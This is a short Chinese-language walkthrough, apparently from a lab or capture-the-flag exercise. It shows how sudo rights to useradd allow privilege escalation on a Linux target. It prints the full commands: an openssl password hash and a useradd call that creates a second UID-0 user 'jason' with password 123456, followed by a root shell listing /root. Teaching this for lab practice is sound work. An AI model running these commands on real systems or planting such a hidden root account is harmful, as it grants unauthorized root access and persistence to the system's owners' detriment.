利用Useradd命令提权步骤

如果Shell用户的sudo权限中可以执行命令useradd,那么可以通过该命令实现提权。

第一步：可以在Kali Linux上创建用户密码（假设要创建的用户名为jason)

┌──(kali㉿kali)-[~]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41

第二步：在目标主机即靶机上执行命令useradd, 注意务必加上-o选项

o, --non-unique              allow to create users with duplicate
                                (non-unique) UID

因为我们要创建的用户jason，将使用与root用户相同的UID，即0

ppp@ino:~$ sudo /usr/sbin/useradd -p '$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41' -u 0 -o -g root -G root -s /bin/bash jason

ppp@ino:~$ su - jason
su - jason
Password: 123456

root@ino:/home/ppp# cd /root
cd /root
root@ino:/root# ls -alh
ls -alh
total 28K
drwx------  3 root root 4.0K Dec  5  2020 .
drwxr-xr-x 18 root root 4.0K Oct 27  2020 ..
lrwxrwxrwx  1 root root    9 Dec  5  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root 3.5K Oct 26  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile

这样可以成功实现目标靶机的本地提权。